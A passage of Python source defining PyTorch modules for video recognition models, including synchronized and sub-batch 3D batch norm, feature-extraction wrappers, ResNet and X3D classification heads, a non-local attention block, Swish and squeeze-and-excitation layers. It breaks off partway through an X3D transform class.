from torch.utils.tensorboard import SummaryWriter
from torchvision.utils import make_grid
from sklearn.metrics import confusion_matrix
import scipy.io
class SubBatchNorm3d(nn.Module):
"""
The standard BN layer computes stats across all examples in a GPU. In some
cases it is desirable to compute stats across only a subset of examples
(e.g., in multigrid training https://arxiv.org/abs/1912.00998).
SubBatchNorm3d splits the batch dimension into N splits, and run BN on
each of them separately (so that the stats are computed on each subset of
examples (1/N of batch) independently. During evaluation, it aggregates
the stats from all splits into one BN.
"""
def __init__(self, num_splits, **args):
"""
Args:
num_splits (int): number of splits.
args (list): other arguments.
"""
super(SubBatchNorm3d, self).__init__()
self.num_splits = num_splits
num_features = args['num_features']
if args.get('affine', True):
self.affine = True
args['affine'] = False
self.weight = torch.nn.Parameter(torch.ones(num_features))
self.bias = torch.nn.Parameter(torch.zeros(num_features))
else:
self.affine = False
self.bn = nn.BatchNorm3d(**args)
args['num_features'] = num_features * num_splits
self.split_bn = nn.BatchNorm3d(**args)
def _get_aggregated_mean_std(self, means, stds, n):
"""
Calculate the aggregated mean and stds.
Args:
means (tensor): mean values.
stds (tensor): standard deviations.
n (int): number of sets of means and stds.
"""
mean = means.view(n, -1).sum(0) / n
std = stds.view(n, -1).sum(0) / n + ((means.view(n, -1) - mean) ** 2).view(n, -1).sum(0) / n
return mean.detach(), std.detach()
def aggregate_stats(self):
"""
Synchronize running_mean, and running_var. Call this before eval.
"""
if self.split_bn.track_running_stats:
self.bn.running_mean.data, self.bn.running_var.data = self._get_aggregated_mean_std(self.split_bn.running_mean, self.split_bn.running_var, self.num_splits)
def forward(self, x):
if self.training:
n, c, t, h, w = x.shape
x = x.view(n // self.num_splits, c * self.num_splits, t, h, w)
x = self.split_bn(x)
x = x.view(n, c, t, h, w)
else:
x = self.bn(x)
if self.affine:
x = x * self.weight.view((-1, 1, 1, 1))
x = x + self.bias.view((-1, 1, 1, 1))
return x
class GroupGather(Function):
"""
GroupGather performs all gather on each of the local process/ GPU groups.
"""
@staticmethod
def forward(ctx, input, num_sync_devices, num_groups):
"""
Perform forwarding, gathering the stats across different process/ GPU
group.
"""
ctx.num_sync_devices = num_sync_devices
ctx.num_groups = num_groups
input_list = [torch.zeros_like(input) for k in range(du.get_local_size())]
dist.all_gather(input_list, input, async_op=False, group=du._LOCAL_PROCESS_GROUP)
inputs = torch.stack(input_list, dim=0)
if num_groups > 1:
rank = du.get_local_rank()
group_idx = rank // num_sync_devices
inputs = inputs[group_idx * num_sync_devices:(group_idx + 1) * num_sync_devices]
inputs = torch.sum(inputs, dim=0)
return inputs
@staticmethod
def backward(ctx, grad_output):
"""
Perform backwarding, gathering the gradients across different process/ GPU
group.
"""
grad_output_list = [torch.zeros_like(grad_output) for k in range(du.get_local_size())]
dist.all_gather(grad_output_list, grad_output, async_op=False, group=du._LOCAL_PROCESS_GROUP)
grads = torch.stack(grad_output_list, dim=0)
if ctx.num_groups > 1:
rank = du.get_local_rank()
group_idx = rank // ctx.num_sync_devices
grads = grads[group_idx * ctx.num_sync_devices:(group_idx + 1) * ctx.num_sync_devices]
grads = torch.sum(grads, dim=0)
return grads, None, None
class NaiveSyncBatchNorm3d(nn.BatchNorm3d):
def __init__(self, num_sync_devices, **args):
"""
Naive version of Synchronized 3D BatchNorm.
Args:
num_sync_devices (int): number of device to sync.
args (list): other arguments.
"""
self.num_sync_devices = num_sync_devices
if self.num_sync_devices > 0:
assert du.get_local_size() % self.num_sync_devices == 0, (du.get_local_size(), self.num_sync_devices)
self.num_groups = du.get_local_size() // self.num_sync_devices
else:
self.num_sync_devices = du.get_local_size()
self.num_groups = 1
super(NaiveSyncBatchNorm3d, self).__init__(**args)
def forward(self, input):
if du.get_local_size() == 1 or not self.training:
return super().forward(input)
assert input.shape[0] > 0, 'SyncBatchNorm does not support empty inputs'
C = input.shape[1]
mean = torch.mean(input, dim=[0, 2, 3, 4])
meansqr = torch.mean(input * input, dim=[0, 2, 3, 4])
vec = torch.cat([mean, meansqr], dim=0)
vec = GroupGather.apply(vec, self.num_sync_devices, self.num_groups) * (1.0 / self.num_sync_devices)
mean, meansqr = torch.split(vec, C)
var = meansqr - mean * mean
self.running_mean += self.momentum * (mean.detach() - self.running_mean)
self.running_var += self.momentum * (var.detach() - self.running_var)
invstd = torch.rsqrt(var + self.eps)
scale = self.weight * invstd
bias = self.bias - mean * scale
scale = scale.reshape(1, -1, 1, 1, 1)
bias = bias.reshape(1, -1, 1, 1, 1)
return input * scale + bias
def get_same_padding(x: int, k: int, s: int, d: int):
return max((int(math.ceil(x // s)) - 1) * s + (k - 1) * d + 1 - x, 0)
def pad_same(x, k, s, d=(1, 1), value=0):
ih, iw = x.size()[-2:]
pad_h, pad_w = get_same_padding(ih, k[0], s[0], d[0]), get_same_padding(iw, k[1], s[1], d[1])
if pad_h > 0 or pad_w > 0:
x = F.pad(x, [pad_w // 2, pad_w - pad_w // 2, pad_h // 2, pad_h - pad_h // 2], value=value)
return x
def conv2d_same(x, weight: torch.Tensor, bias: Optional[torch.Tensor]=None, stride: Tuple[int, int]=(1, 1), padding: Tuple[int, int]=(0, 0), dilation: Tuple[int, int]=(1, 1), groups: int=1):
x = pad_same(x, weight.shape[-2:], stride, dilation)
return F.conv2d(x, weight, bias, stride, (0, 0), dilation, groups)
class Conv2dSame(nn.Conv2d):
""" Tensorflow like 'SAME' convolution wrapper for 2D convolutions
"""
def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True):
super(Conv2dSame, self).__init__(in_channels, out_channels, kernel_size, stride, 0, dilation, groups, bias)
def forward(self, x):
return conv2d_same(x, self.weight, self.bias, self.stride, self.padding, self.dilation, self.groups)
class FeatureInfo:
def __init__(self, feature_info: List[Dict], out_indices: Tuple[int]):
prev_reduction = 1
for fi in feature_info:
assert 'num_chs' in fi and fi['num_chs'] > 0
assert 'reduction' in fi and fi['reduction'] >= prev_reduction
prev_reduction = fi['reduction']
assert 'module' in fi
self.out_indices = out_indices
self.info = feature_info
def from_other(self, out_indices: Tuple[int]):
return FeatureInfo(deepcopy(self.info), out_indices)
def get(self, key, idx=None):
""" Get value by key at specified index (indices)
if idx == None, returns value for key at each output index
if idx is an integer, return value for that feature module index (ignoring output indices)
if idx is a list/tupple, return value for each module index (ignoring output indices)
"""
if idx is None:
return [self.info[i][key] for i in self.out_indices]
if isinstance(idx, (tuple, list)):
return [self.info[i][key] for i in idx]
else:
return self.info[idx][key]
def get_dicts(self, keys=None, idx=None):
""" return info dicts for specified keys (or all if None) at specified indices (or out_indices if None)
"""
if idx is None:
if keys is None:
return [self.info[i] for i in self.out_indices]
else:
return [{k: self.info[i][k] for k in keys} for i in self.out_indices]
if isinstance(idx, (tuple, list)):
return [(self.info[i] if keys is None else {k: self.info[i][k] for k in keys}) for i in idx]
else:
return self.info[idx] if keys is None else {k: self.info[idx][k] for k in keys}
def channels(self, idx=None):
""" feature channels accessor
"""
return self.get('num_chs', idx)
def reduction(self, idx=None):
""" feature reduction (output stride) accessor
"""
return self.get('reduction', idx)
def module_name(self, idx=None):
""" feature module name accessor
"""
return self.get('module', idx)
def __getitem__(self, item):
return self.info[item]
def __len__(self):
return len(self.info)
def _get_feature_info(net, out_indices):
feature_info = getattr(net, 'feature_info')
if isinstance(feature_info, FeatureInfo):
return feature_info.from_other(out_indices)
elif isinstance(feature_info, (list, tuple)):
return FeatureInfo(net.feature_info, out_indices)
else:
assert False, 'Provided feature_info is not valid'
def _get_return_layers(feature_info, out_map):
module_names = feature_info.module_name()
return_layers = {}
for i, name in enumerate(module_names):
return_layers[name] = out_map[i] if out_map is not None else feature_info.out_indices[i]
return return_layers
def _module_list(module, flatten_sequential=False):
ml = []
for name, module in module.named_children():
if flatten_sequential and isinstance(module, nn.Sequential):
for child_name, child_module in module.named_children():
combined = [name, child_name]
ml.append(('_'.join(combined), '.'.join(combined), child_module))
else:
ml.append((name, name, module))
return ml
class FeatureDictNet(nn.ModuleDict):
    """ Feature extractor returning an OrderedDict of intermediate features.

    The wrapped model is partially rebuilt from its direct children (optionally
    flattening one level of nn.Sequential containers) and truncated after the
    last module needed to produce the requested out_indices.

    Assumes submodules were registered on the wrapped model in execution order
    and that no nn.Module instance is reused (including trivial modules like
    `self.relu = nn.ReLU`). Only modules assigned directly to the model, or at
    most one Sequential deep (with flatten_sequential=True), can be captured;
    a Sequential child `model.features.1` is re-registered here as
    `model.features_1`.

    Arguments:
        model (nn.Module): model from which we will extract the features
        out_indices (tuple[int]): model output indices to extract features for
        out_map (sequence): list or tuple specifying desired return id for each out index,
            otherwise str(index) is used
        feature_concat (bool): whether to concatenate intermediate features that are lists or tuples
            vs select element [0]
        flatten_sequential (bool): whether to flatten sequential modules assigned to model
    """

    def __init__(self, model, out_indices=(0, 1, 2, 3, 4), out_map=None, feature_concat=False, flatten_sequential=False):
        super(FeatureDictNet, self).__init__()
        self.feature_info = _get_feature_info(model, out_indices)
        self.concat = feature_concat
        self.return_layers = {}
        return_layers = _get_return_layers(self.feature_info, out_map)
        remaining = set(return_layers)
        kept = OrderedDict()
        # keep modules in order until every requested return layer is found
        for new_name, orig_name, child in _module_list(model, flatten_sequential=flatten_sequential):
            kept[new_name] = child
            if orig_name in remaining:
                self.return_layers[new_name] = str(return_layers[orig_name])
                remaining.discard(orig_name)
            if not remaining:
                break
        assert not remaining and len(self.return_layers) == len(return_layers), f'Return layers ({remaining}) are not present in model'
        self.update(kept)

    def _collect(self, x) ->Dict[str, torch.Tensor]:
        features = OrderedDict()
        for name, child in self.items():
            x = child(x)
            if name not in self.return_layers:
                continue
            out_id = self.return_layers[name]
            if isinstance(x, (tuple, list)):
                # multi-output module: concat along channel dim or take the first
                features[out_id] = torch.cat(x, 1) if self.concat else x[0]
            else:
                features[out_id] = x
        return features

    def forward(self, x) ->Dict[str, torch.Tensor]:
        return self._collect(x)
class FeatureListNet(FeatureDictNet):
    """ Feature extractor with list return.

    Identical to FeatureDictNet except that forward() returns the collected
    features as a plain list; exists only to satisfy Torchscript typing,
    which cannot switch between List[Tensor] and Dict[id, Tensor] returns.
    """

    def __init__(self, model, out_indices=(0, 1, 2, 3, 4), out_map=None, feature_concat=False, flatten_sequential=False):
        super(FeatureListNet, self).__init__(
            model, out_indices=out_indices, out_map=out_map,
            feature_concat=feature_concat, flatten_sequential=flatten_sequential)

    def forward(self, x) ->List[torch.Tensor]:
        features = self._collect(x)
        return list(features.values())
class FeatureHooks:
    """ Feature Hook Helper

    Registers forward / forward-pre hooks on named submodules of a model and
    accumulates their outputs per device so they can be fetched after a
    forward pass. Works well in eager Python but needs redesign for
    torchscript.

    Arguments:
        hooks (sequence of dict): each entry has a 'module' name and an
            optional 'hook_type' ('forward' or 'forward_pre').
        named_modules: iterable of (name, module) pairs, e.g. model.named_modules().
        out_map (sequence): optional output ids, one per hook entry; defaults
            to the hooked module's name.
        default_hook_type (str): hook type used when an entry has none.
    """

    def __init__(self, hooks, named_modules, out_map=None, default_hook_type='forward'):
        modules = {k: v for k, v in named_modules}
        for i, h in enumerate(hooks):
            hook_name = h['module']
            m = modules[hook_name]
            hook_id = out_map[i] if out_map else hook_name
            # bind the output id as the first arg of the hook callback
            hook_fn = partial(self._collect_output_hook, hook_id)
            hook_type = h.get('hook_type', default_hook_type)
            if hook_type == 'forward_pre':
                m.register_forward_pre_hook(hook_fn)
            elif hook_type == 'forward':
                m.register_forward_hook(hook_fn)
            else:
                assert False, 'Unsupported hook type'
        # outputs are keyed by device first so multi-GPU replicas do not clash
        self._feature_outputs = defaultdict(OrderedDict)

    def _collect_output_hook(self, hook_id, *args):
        # last positional arg is the output (forward hook) or the input
        # tuple (forward-pre hook)
        x = args[-1]
        if isinstance(x, tuple):
            x = x[0]
        self._feature_outputs[x.device][hook_id] = x

    def get_output(self, device) ->Dict[str, torch.Tensor]:
        """Return and clear the features collected on `device`."""
        # NOTE: fixed return annotation -- torch.Tensor is the type,
        # torch.tensor is the factory function.
        output = self._feature_outputs[device]
        self._feature_outputs[device] = OrderedDict()
        return output
class FeatureHookNet(nn.ModuleDict):
    """ FeatureHookNet
    Wrap a model and extract features specified by the out indices using forward/forward-pre hooks.
    If `no_rewrite` is True, features are extracted via hooks without modifying the underlying
    network in any way.
    If `no_rewrite` is False, the model will be re-written as in the
    FeatureList/FeatureDict case by folding first to second (Sequential only) level modules into this one.
    FIXME this does not currently work with Torchscript, see FeatureHooks class
    """

    def __init__(self, model, out_indices=(0, 1, 2, 3, 4), out_map=None, out_as_dict=False, no_rewrite=False, feature_concat=False, flatten_sequential=False, default_hook_type='forward'):
        super(FeatureHookNet, self).__init__()
        # hooks are registered eagerly; this class cannot be scripted
        assert not torch.jit.is_scripting()
        self.feature_info = _get_feature_info(model, out_indices)
        self.out_as_dict = out_as_dict
        layers = OrderedDict()
        hooks = []
        if no_rewrite:
            # keep the model intact; hook every module named in feature_info
            assert not flatten_sequential
            if hasattr(model, 'reset_classifier'):
                model.reset_classifier(0)
            layers['body'] = model
            hooks.extend(self.feature_info.get_dicts())
        else:
            # rebuild from (flattened) children, truncating after the last
            # module that contains a hooked submodule
            modules = _module_list(model, flatten_sequential=flatten_sequential)
            # map of still-unmatched hook target name -> hook type
            remaining = {f['module']: (f['hook_type'] if 'hook_type' in f else default_hook_type) for f in self.feature_info.get_dicts()}
            for new_name, old_name, module in modules:
                layers[new_name] = module
                # search this child's subtree for hook targets (names are
                # prefixed with the child's original name)
                for fn, fm in module.named_modules(prefix=old_name):
                    if fn in remaining:
                        hooks.append(dict(module=fn, hook_type=remaining[fn]))
                        del remaining[fn]
                if not remaining:
                    break
            assert not remaining, f'Return layers ({remaining}) are not present in model'
        self.update(layers)
        self.hooks = FeatureHooks(hooks, model.named_modules(), out_map=out_map)

    def forward(self, x):
        # run the (possibly truncated) module chain; outputs are captured
        # by the registered hooks rather than returned directly
        for name, module in self.items():
            x = module(x)
        out = self.hooks.get_output(x.device)
        return out if self.out_as_dict else list(out.values())
class ResNetBasicHead(nn.Module):
    """
    ResNe(X)t 3D head.
    Pools each input pathway spatiotemporally, concatenates the pooled
    features across pathways, and projects them to class scores with a
    fully-connected layer. The softmax/sigmoid activation and the
    spatiotemporal averaging are applied only at test time.
    """

    def __init__(self, dim_in, num_classes, pool_size, dropout_rate=0.0, act_func='softmax'):
        """
        Args:
            dim_in (list): channel dimensions of the p input pathways.
            num_classes (int): number of output classes.
            pool_size (list): per-pathway spatiotemporal pooling kernel
                (temporal, height, width); a None entry selects adaptive
                average pooling to 1x1x1.
            dropout_rate (float): dropout rate; 0.0 disables dropout.
            act_func (string): test-time activation, 'softmax' or 'sigmoid'.
        """
        super(ResNetBasicHead, self).__init__()
        assert len({len(pool_size), len(dim_in)}) == 1, 'pathway dimensions are not consistent.'
        self.num_pathways = len(pool_size)
        for pathway, size in enumerate(pool_size):
            pool = nn.AdaptiveAvgPool3d((1, 1, 1)) if size is None else nn.AvgPool3d(size, stride=1)
            self.add_module('pathway{}_avgpool'.format(pathway), pool)
        if dropout_rate > 0.0:
            self.dropout = nn.Dropout(dropout_rate)
        self.projection = nn.Linear(sum(dim_in), num_classes, bias=True)
        # dim=4 is the channel axis after the (N, T, H, W, C) permute in forward
        if act_func == 'softmax':
            self.act = nn.Softmax(dim=4)
        elif act_func == 'sigmoid':
            self.act = nn.Sigmoid()
        else:
            raise NotImplementedError('{} is not supported as an activationfunction.'.format(act_func))

    def forward(self, inputs):
        assert len(inputs) == self.num_pathways, 'Input tensor does not contain {} pathway'.format(self.num_pathways)
        pooled = [getattr(self, 'pathway{}_avgpool'.format(p))(inp) for p, inp in enumerate(inputs)]
        x = torch.cat(pooled, 1)
        # (N, C, T, H, W) -> (N, T, H, W, C) so the linear layer acts on channels
        x = x.permute((0, 2, 3, 4, 1))
        if hasattr(self, 'dropout'):
            x = self.dropout(x)
        x = self.projection(x)
        if not self.training:
            x = self.act(x)
            x = x.mean([1, 2, 3])
        return x.view(x.shape[0], -1)
class X3DHead(nn.Module):
    """
    X3D head.
    Expands channels with a 1x1x1 conv, pools spatiotemporally, expands again
    with a second 1x1x1 conv (`lin_5`), and projects to class scores with a
    fully-connected layer. The softmax/sigmoid activation and the averaging
    over remaining spatiotemporal dims are applied only at test time.
    """

    def __init__(self, dim_in, dim_inner, dim_out, num_classes, pool_size, dropout_rate=0.0, act_func='softmax', inplace_relu=True, eps=1e-05, bn_mmt=0.1, norm_module=nn.BatchNorm3d, bn_lin5_on=False):
        """
        Args:
            dim_in (float): channel dimension C of the (single pathway) input.
            dim_inner (int): channel dimension after the first 1x1x1 conv.
            dim_out (int): channel dimension after the `lin_5` conv.
            num_classes (int): number of output classes.
            pool_size (float): TxHxW pooling kernel; None selects adaptive
                average pooling to 1x1x1.
            dropout_rate (float): dropout rate; 0.0 disables dropout.
            act_func (string): test-time activation, 'softmax' or 'sigmoid'.
            inplace_relu (bool): compute ReLU in place.
            eps (float): epsilon for batch norm.
            bn_mmt (float): batch norm momentum (PyTorch convention:
                1 - Caffe2 momentum).
            norm_module (nn.Module): normalization layer class, default
                nn.BatchNorm3d.
            bn_lin5_on (bool): if True, normalize the `lin_5` output before
                the classifier.
        """
        super(X3DHead, self).__init__()
        self.pool_size = pool_size
        self.dropout_rate = dropout_rate
        self.num_classes = num_classes
        self.act_func = act_func
        self.eps = eps
        self.bn_mmt = bn_mmt
        self.inplace_relu = inplace_relu
        self.bn_lin5_on = bn_lin5_on
        self._construct_head(dim_in, dim_inner, dim_out, norm_module)

    def _construct_head(self, dim_in, dim_inner, dim_out, norm_module):
        # 1x1x1 expansion conv + BN + ReLU
        self.conv_5 = nn.Conv3d(dim_in, dim_inner, kernel_size=(1, 1, 1), stride=(1, 1, 1), padding=(0, 0, 0), bias=False)
        self.conv_5_bn = norm_module(num_features=dim_inner, eps=self.eps, momentum=self.bn_mmt)
        self.conv_5_relu = nn.ReLU(self.inplace_relu)
        if self.pool_size is None:
            self.avg_pool = nn.AdaptiveAvgPool3d((1, 1, 1))
        else:
            self.avg_pool = nn.AvgPool3d(self.pool_size, stride=1)
        # second 1x1x1 expansion after pooling
        self.lin_5 = nn.Conv3d(dim_inner, dim_out, kernel_size=(1, 1, 1), stride=(1, 1, 1), padding=(0, 0, 0), bias=False)
        if self.bn_lin5_on:
            self.lin_5_bn = norm_module(num_features=dim_out, eps=self.eps, momentum=self.bn_mmt)
        self.lin_5_relu = nn.ReLU(self.inplace_relu)
        if self.dropout_rate > 0.0:
            self.dropout = nn.Dropout(self.dropout_rate)
        self.projection = nn.Linear(dim_out, self.num_classes, bias=True)
        # dim=4 is the channel axis after the (N, T, H, W, C) permute in forward
        if self.act_func == 'softmax':
            self.act = nn.Softmax(dim=4)
        elif self.act_func == 'sigmoid':
            self.act = nn.Sigmoid()
        else:
            raise NotImplementedError('{} is not supported as an activationfunction.'.format(self.act_func))

    def forward(self, inputs):
        assert len(inputs) == 1, 'Input tensor does not contain 1 pathway'
        out = self.conv_5(inputs[0])
        out = self.conv_5_bn(out)
        out = self.conv_5_relu(out)
        out = self.avg_pool(out)
        out = self.lin_5(out)
        if self.bn_lin5_on:
            out = self.lin_5_bn(out)
        out = self.lin_5_relu(out)
        # (N, C, T, H, W) -> (N, T, H, W, C) for the linear projection
        out = out.permute((0, 2, 3, 4, 1))
        if hasattr(self, 'dropout'):
            out = self.dropout(out)
        out = self.projection(out)
        if not self.training:
            out = self.act(out)
            out = out.mean([1, 2, 3])
        return out.view(out.shape[0], -1)
class Linear(nn.Linear):
    """nn.Linear wrapper that keeps TorchScript happy about the Optional bias.

    Under scripting, `self.bias` is re-bound through a local so its
    Optional[Tensor] type is handled explicitly; eager execution is unchanged.
    """

    def forward(self, input: torch.Tensor) ->torch.Tensor:
        if not torch.jit.is_scripting():
            return F.linear(input, self.weight, self.bias)
        bias = self.bias if self.bias is not None else None
        return F.linear(input, self.weight, bias=bias)
class Nonlocal(nn.Module):
    """
    Builds Non-local Neural Networks as a generic family of building
    blocks for capturing long-range dependencies. Non-local Network
    computes the response at a position as a weighted sum of the
    features at all positions. This building block can be plugged into
    many computer vision architectures.
    More details in the paper: https://arxiv.org/pdf/1711.07971.pdf
    """

    def __init__(self, dim, dim_inner, pool_size=None, instantiation='softmax', zero_init_final_conv=False, zero_init_final_norm=True, norm_eps=1e-05, norm_momentum=0.1, norm_module=nn.BatchNorm3d):
        """
        Args:
            dim (int): number of dimension for the input.
            dim_inner (int): number of dimension inside of the Non-local block.
            pool_size (list): the kernel size of spatial temporal pooling,
                temporal pool kernel size, spatial pool kernel size, spatial
                pool kernel size in order. By default pool_size is None,
                then there would be no pooling used.
            instantiation (string): supports two different instantiation method:
                "dot_product": normalizing correlation matrix with L2.
                "softmax": normalizing correlation matrix with Softmax.
            zero_init_final_conv (bool): If true, zero initializing the final
                convolution of the Non-local block.
            zero_init_final_norm (bool):
                If true, zero initializing the final batch norm of the Non-local
                block.
            norm_eps (float): epsilon for the normalization layer.
            norm_momentum (float): momentum for the normalization layer.
            norm_module (nn.Module): nn.Module for the normalization layer. The
                default is nn.BatchNorm3d.
        """
        super(Nonlocal, self).__init__()
        self.dim = dim
        self.dim_inner = dim_inner
        self.pool_size = pool_size
        self.instantiation = instantiation
        # pooling only engaged when a kernel dim is actually > 1
        self.use_pool = False if pool_size is None else any(size > 1 for size in pool_size)
        self.norm_eps = norm_eps
        self.norm_momentum = norm_momentum
        self._construct_nonlocal(zero_init_final_conv, zero_init_final_norm, norm_module)

    def _construct_nonlocal(self, zero_init_final_conv, zero_init_final_norm, norm_module):
        # theta/phi/g are the query/key/value projections of the attention
        self.conv_theta = nn.Conv3d(self.dim, self.dim_inner, kernel_size=1, stride=1, padding=0)
        self.conv_phi = nn.Conv3d(self.dim, self.dim_inner, kernel_size=1, stride=1, padding=0)
        self.conv_g = nn.Conv3d(self.dim, self.dim_inner, kernel_size=1, stride=1, padding=0)
        self.conv_out = nn.Conv3d(self.dim_inner, self.dim, kernel_size=1, stride=1, padding=0)
        # flags consumed by an external weight-init routine (not used here)
        self.conv_out.zero_init = zero_init_final_conv
        self.bn = norm_module(num_features=self.dim, eps=self.norm_eps, momentum=self.norm_momentum)
        self.bn.transform_final_bn = zero_init_final_norm
        if self.use_pool:
            self.pool = nn.MaxPool3d(kernel_size=self.pool_size, stride=self.pool_size, padding=[0, 0, 0])

    def forward(self, x):
        x_identity = x
        N, C, T, H, W = x.size()
        theta = self.conv_theta(x)
        # pool only the key/value path; queries keep full resolution so the
        # output retains the input's spatiotemporal size
        if self.use_pool:
            x = self.pool(x)
        phi = self.conv_phi(x)
        g = self.conv_g(x)
        theta = theta.view(N, self.dim_inner, -1)
        phi = phi.view(N, self.dim_inner, -1)
        g = g.view(N, self.dim_inner, -1)
        # (N, C, THW_q) x (N, C, THW_kv) -> (N, THW_q, THW_kv) affinity
        theta_phi = torch.einsum('nct,ncp->ntp', (theta, phi))
        if self.instantiation == 'softmax':
            # scale by 1/sqrt(C) before softmax, as in scaled dot-product attention
            theta_phi = theta_phi * self.dim_inner ** -0.5
            theta_phi = nn.functional.softmax(theta_phi, dim=2)
        elif self.instantiation == 'dot_product':
            spatial_temporal_dim = theta_phi.shape[2]
            theta_phi = theta_phi / spatial_temporal_dim
        else:
            raise NotImplementedError('Unknown norm type {}'.format(self.instantiation))
        # weighted sum of values: (N, THW_q, THW_kv) x (N, C, THW_kv) -> (N, C, THW_q)
        theta_phi_g = torch.einsum('ntg,ncg->nct', (theta_phi, g))
        theta_phi_g = theta_phi_g.view(N, self.dim_inner, T, H, W)
        p = self.conv_out(theta_phi_g)
        p = self.bn(p)
        # residual connection
        return x_identity + p
class SwishEfficient(torch.autograd.Function):
    """Swish activation function: x * sigmoid(x).

    Memory-efficient custom autograd implementation: only the input is saved
    for backward and the derivative sigmoid(x) * (1 + x * (1 - sigmoid(x)))
    is recomputed, rather than keeping intermediate activations alive.
    """

    @staticmethod
    def forward(ctx, x):
        result = x * torch.sigmoid(x)
        ctx.save_for_backward(x)
        return result

    @staticmethod
    def backward(ctx, grad_output):
        # ctx.saved_tensors replaces the long-deprecated ctx.saved_variables
        x, = ctx.saved_tensors
        sigmoid_x = torch.sigmoid(x)
        return grad_output * (sigmoid_x * (1 + x * (1 - sigmoid_x)))
class Swish(nn.Module):
    """Swish activation module: x * sigmoid(x).

    Thin nn.Module wrapper around the memory-efficient SwishEfficient
    autograd function so swish can be used inside nn.Sequential chains.
    """

    def __init__(self):
        super(Swish, self).__init__()

    def forward(self, x):
        return SwishEfficient.apply(x)
class SE(nn.Module):
    """Squeeze-and-Excitation (SE) block w/ Swish: AvgPool, FC, Swish, FC, Sigmoid."""

    def _round_width(self, width, multiplier, min_width=8, divisor=8):
        """
        Scale `width` by `multiplier` and round to a multiple of `divisor`.

        Args:
            width (int): the channel dimensions of the input.
            multiplier (float): the multiplication factor.
            min_width (int): the minimum width after multiplication.
            divisor (int): the new width should be dividable by divisor.
        """
        if not multiplier:
            return width
        scaled = width * multiplier
        floor = min_width or divisor
        rounded = max(floor, int(scaled + divisor / 2) // divisor * divisor)
        # never round down by more than 10%
        if rounded < 0.9 * scaled:
            rounded += divisor
        return int(rounded)

    def __init__(self, dim_in, ratio, relu_act=True):
        """
        Args:
            dim_in (int): the channel dimensions of the input.
            ratio (float): the channel reduction ratio for squeeze.
            relu_act (bool): use ReLU for the squeeze activation instead of
                Swish (the default squeeze activation here is ReLU).
        """
        super(SE, self).__init__()
        # NOTE: forward() runs self.children() in registration order, so the
        # order of these assignments defines the computation.
        self.avg_pool = nn.AdaptiveAvgPool3d((1, 1, 1))
        dim_fc = self._round_width(dim_in, ratio)
        self.fc1 = nn.Conv3d(dim_in, dim_fc, 1, bias=True)
        self.fc1_act = nn.ReLU() if relu_act else Swish()
        self.fc2 = nn.Conv3d(dim_fc, dim_in, 1, bias=True)
        self.fc2_sig = nn.Sigmoid()

    def forward(self, x):
        scale = x
        for layer in self.children():
            scale = layer(scale)
        # per-channel gating of the original input
        return x * scale
class BasicTransform(nn.Module):
    """
    Basic transformation: Tx3x3, 1x3x3, where T is the size of temporal kernel.
    """

    def __init__(self, dim_in, dim_out, temp_kernel_size, stride, dim_inner=None, num_groups=1, stride_1x1=None, inplace_relu=True, eps=1e-05, bn_mmt=0.1, norm_module=nn.BatchNorm3d, block_idx=0):
        """
        Args:
            dim_in (int): input channel dimension.
            dim_out (int): output channel dimension.
            temp_kernel_size (int): temporal kernel size of the first conv.
            stride (int): spatial stride applied by the first conv.
            dim_inner (None): unused; kept for signature compatibility with
                the other transform classes.
            num_groups (int): unused; group count is always 1 for BasicTransform.
            stride_1x1 (None): unused in BasicTransform.
            inplace_relu (bool): compute ReLU in place.
            eps (float): epsilon for batch norm.
            bn_mmt (float): batch norm momentum (PyTorch convention:
                1 - Caffe2 momentum).
            norm_module (nn.Module): normalization layer class, default
                nn.BatchNorm3d.
        """
        super(BasicTransform, self).__init__()
        self.temp_kernel_size = temp_kernel_size
        self._inplace_relu = inplace_relu
        self._eps = eps
        self._bn_mmt = bn_mmt
        self._construct(dim_in, dim_out, stride, norm_module)

    def _construct(self, dim_in, dim_out, stride, norm_module):
        # Tx3x3 conv carrying the spatial stride, padded to preserve T
        self.a = nn.Conv3d(dim_in, dim_out, kernel_size=[self.temp_kernel_size, 3, 3], stride=[1, stride, stride], padding=[int(self.temp_kernel_size // 2), 1, 1], bias=False)
        self.a_bn = norm_module(num_features=dim_out, eps=self._eps, momentum=self._bn_mmt)
        self.a_relu = nn.ReLU(inplace=self._inplace_relu)
        # 1x3x3 conv, stride 1
        self.b = nn.Conv3d(dim_out, dim_out, kernel_size=[1, 3, 3], stride=[1, 1, 1], padding=[0, 1, 1], bias=False)
        self.b_bn = norm_module(num_features=dim_out, eps=self._eps, momentum=self._bn_mmt)
        # flag read by an external weight-init routine to zero this BN's gamma
        self.b_bn.transform_final_bn = True

    def forward(self, x):
        out = self.a_relu(self.a_bn(self.a(x)))
        out = self.b_bn(self.b(out))
        return out
class X3DTransform(nn.Module):
    """
    X3D transformation: 1x1x1, Tx3x3 (channelwise, num_groups=dim_in), 1x1x1,
    augmented with (optional) SE (squeeze-excitation) on the 3x3x3 output.
    T is the temporal kernel size (defaulting to 3)
    """

    def __init__(self, dim_in, dim_out, temp_kernel_size, stride, dim_inner, num_groups, stride_1x1=False, inplace_relu=True, eps=1e-05, bn_mmt=0.1, dilation=1, norm_module=nn.BatchNorm3d, se_ratio=0.0625, swish_inner=True, block_idx=0):
        """
        Args:
            dim_in (int): the channel dimensions of the input.
            dim_out (int): the channel dimension of the output.
            temp_kernel_size (int): the temporal kernel sizes of the middle
                convolution in the bottleneck.
            stride (int): the stride of the bottleneck.
            dim_inner (int): the inner dimension of the block.
            num_groups (int): number of groups for the convolution. num_groups=1
                is for standard ResNet like networks, and num_groups>1 is for
                ResNeXt like networks.
            stride_1x1 (bool): if True, apply stride to 1x1 conv, otherwise
                apply stride to the 3x3 conv.
            inplace_relu (bool): if True, calculate the relu on the original
                input without allocating new memory.
            eps (float): epsilon for batch norm.
            bn_mmt (float): momentum for batch norm. Noted that BN momentum in
                PyTorch = 1 - BN momentum in Caffe2.
            dilation (int): size of dilation.
            norm_module (nn.Module): nn.Module for the normalization layer. The
                default is nn.BatchNorm3d.
            se_ratio (float): if > 0, apply SE to the Tx3x3 conv, with the SE
                channel dimensionality being se_ratio times the Tx3x3 conv dim.
            swish_inner (bool): if True, apply swish to the Tx3x3 conv, otherwise
                apply ReLU to the Tx3x3 conv.
            block_idx (int): index of this block within its stage; SE is only
                inserted on every other block (even indices).
        """
        super(X3DTransform, self).__init__()
        self.temp_kernel_size = temp_kernel_size
        self._inplace_relu = inplace_relu
        self._eps = eps
        self._bn_mmt = bn_mmt
        self._se_ratio = se_ratio
